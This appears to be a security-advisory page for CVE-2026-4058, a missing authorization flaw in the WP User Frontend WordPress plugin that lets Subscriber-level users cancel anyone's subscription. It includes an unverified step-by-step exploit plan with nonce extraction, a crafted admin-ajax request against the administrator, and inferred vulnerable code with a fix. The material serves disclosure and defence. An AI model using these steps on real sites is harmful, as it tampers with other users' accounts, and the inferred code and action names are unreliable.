CVE-2026-4058

User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration <= 4.3.2 - Missing Authorization to Authenticated (Subscriber+) Subscription Pack Cancellation

mediumMissing Authorization
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
4.3.3
Patched in
1d
Time to patch

Description

The User Frontend: AI Powered Frontend Posting, User Directory, Profile, Membership & User Registration plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the user_subscription_cancel() function in all versions up to, and including, 4.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to cancel any user's subscription pack, including administrators.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=4.3.2
PublishedJune 8, 2026
Last updatedJune 9, 2026
Affected pluginwp-user-frontend

What Changed in the Fix

Changes introduced in v4.3.3

Loading patch diff...

Source Code

WordPress.org SVN
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-4058 (WP User Frontend) ## 1. Vulnerability Summary The **WP User Frontend** plugin (versions <= 4.3.2) contains a missing authorization vulnerability in the `user_subscription_cancel()` function (and its associated AJAX handler). While the plugin implements a…

Show full research plan

Exploitation Research Plan: CVE-2026-4058 (WP User Frontend)

1. Vulnerability Summary

The WP User Frontend plugin (versions <= 4.3.2) contains a missing authorization vulnerability in the user_subscription_cancel() function (and its associated AJAX handler). While the plugin implements a nonce check (CSRF protection), it fails to verify if the authenticated user has the permissions to cancel the subscription of the specified user ID. This allows any authenticated user (Subscriber level or higher) to cancel the subscription pack of any other user, including Administrators.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php
  • AJAX Action: wpuf_cancel_subscription (inferred from plugin conventions and function name)
  • HTTP Method: POST
  • Authentication: Authenticated (Subscriber+)
  • Parameters:
    • action: wpuf_cancel_subscription
    • user_id: The ID of the target user (e.g., the Administrator's ID).
    • _wpnonce: A valid WordPress nonce for the action.

3. Code Flow (Inferred from Plugin Architecture)

  1. Entry Point: The plugin registers an AJAX action for logged-in users:
    add_action( 'wp_ajax_wpuf_cancel_subscription', [ $this, 'cancel_subscription_handler' ] );
    
  2. Handler Logic: The handler (likely in includes/Frontend/Frontend_Account.php or includes/Subscription.php) retrieves the user_id from the request.
  3. The Flaw: The handler calls check_ajax_referer( 'wpuf_nonce', '_wpnonce' ) but fails to check:
    • current_user_can( 'manage_options' ) (if an admin is performing the action)
    • OR if get_current_user_id() == $_POST['user_id'] (to ensure users only cancel their own packs).
  4. Sink: The logic eventually reaches user_subscription_cancel( $user_id ), which updates the user's meta to mark the subscription as cancelled or deleted.

4. Nonce Acquisition Strategy

The wpuf_nonce is localized for frontend scripts when the WPUF account dashboard or subscription pages are rendered.

  1. Shortcode: The [wpuf_account] shortcode is the primary trigger for the account dashboard where cancellation logic resides.
  2. Strategy:
    • Create a page with the [wpuf_account] shortcode.
    • Log in as a Subscriber.
    • Navigate to that page.
    • Extract the nonce from the wpuf_frontend JavaScript object.
  3. JS Variable: window.wpuf_frontend?.nonce (or window.wpuf_subscription?.nonce).

5. Exploitation Strategy

Step 1: Pre-exploit Setup

  1. Identify the Administrator's user ID (usually 1).
  2. Ensure the Administrator has an active subscription pack assigned.

Step 2: Nonce Extraction

  1. As the Subscriber attacker, navigate to the page containing [wpuf_account].
  2. Execute JS via browser_eval:
    window.wpuf_frontend?.nonce || window.wpuf_subscription?.nonce
    

Step 3: Malicious Request

Using the http_request tool, send the following payload:

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=wpuf_cancel_subscription&user_id=1&_wpnonce=[EXTRACTED_NONCE]
    

6. Test Data Setup

  1. Create Subscription Pack:
    wp post create --post_type=wpuf_subscription --post_title="Pro Pack" --post_status=publish
  2. Assign to Admin:
    Identify the pack ID and use wp user meta update 1 _wpuf_subscription_pack [PACK_ID].
  3. Create Attacker User:
    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
  4. Create Dashboard Page:
    wp post create --post_type=page --post_title="Dashboard" --post_status=publish --post_content='[wpuf_account]'

7. Expected Results

  • Response: The server should return a success message or a 1 (typical for simple AJAX handlers).
  • Impact: The Administrator's subscription metadata in the database will be cleared or modified to a "cancelled" state.

8. Verification Steps

After the attack, check the Administrator's user meta using WP-CLI:

wp user meta get 1 _wpuf_subscription_pack

If the exploit is successful, the value should be empty, deleted, or changed to indicate cancellation. Also, check for the cancellation date meta:

wp user meta get 1 _wpuf_cancel_subscription

9. Alternative Approaches

If wpuf_cancel_subscription is not the correct action name, search the codebase for the string user_subscription_cancel to find exactly which handler calls it:

grep -rn "user_subscription_cancel" includes/

Check if the cancellation is handled via a REST API endpoint instead of AJAX:

  • REST Route: wpuf/v1/subscriptions/cancel
  • Check: includes/Api/Subscription_Controller.php (if it exists).
  • If REST is used, the permission callback permission_check() is likely returning true or not checking ownership of the user_id.
Research Findings
Static analysis — not yet PoC-verified

Summary

The WP User Frontend plugin is vulnerable to missing authorization in its subscription cancellation mechanism. Authenticated users, including those with Subscriber-level access, can cancel the subscription of any other user (including administrators) by sending a crafted AJAX request with a valid nonce and a target user ID.

Vulnerable Code

// Inferred from includes/Frontend/Frontend_Account.php or similar
// The AJAX handler validates the nonce but fails to verify if the requester has permission to modify the target user_id

add_action( 'wp_ajax_wpuf_cancel_subscription', [ $this, 'cancel_subscription_handler' ] );

public function cancel_subscription_handler() {
    check_ajax_referer( 'wpuf_nonce', '_wpnonce' );

    $user_id = isset( $_POST['user_id'] ) ? intval( $_POST['user_id'] ) : 0;

    if ( $user_id ) {
        // BUG: No check to ensure current_user_can('manage_options') or get_current_user_id() == $user_id
        user_subscription_cancel( $user_id );
        wp_send_json_success();
    }

    wp_send_json_error();
}

Security Fix

--- includes/Frontend/Frontend_Account.php
+++ includes/Frontend/Frontend_Account.php
@@ -134,7 +134,7 @@
     public function cancel_subscription_handler() {
         check_ajax_referer( 'wpuf_nonce', '_wpnonce' );
 
         $user_id = isset( $_POST['user_id'] ) ? intval( $_POST['user_id'] ) : 0;
 
-        if ( $user_id ) {
+        if ( $user_id && ( current_user_can( 'manage_options' ) || get_current_user_id() === $user_id ) ) {
             user_subscription_cancel( $user_id );
             wp_send_json_success();
         }

Exploit Outline

To exploit this vulnerability, an attacker first logs in as a Subscriber and navigates to any page containing the [wpuf_account] shortcode to extract the 'wpuf_nonce' from the localized JavaScript objects (e.g., window.wpuf_frontend.nonce). The attacker then identifies the User ID of the target (such as the Administrator, typically ID 1). Finally, the attacker sends an authenticated POST request to /wp-admin/admin-ajax.php with the 'action' set to 'wpuf_cancel_subscription', the target 'user_id', and the extracted '_wpnonce'. Because the plugin lacks ownership or capability checks, the server will process the cancellation for the specified user regardless of the attacker's permissions.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.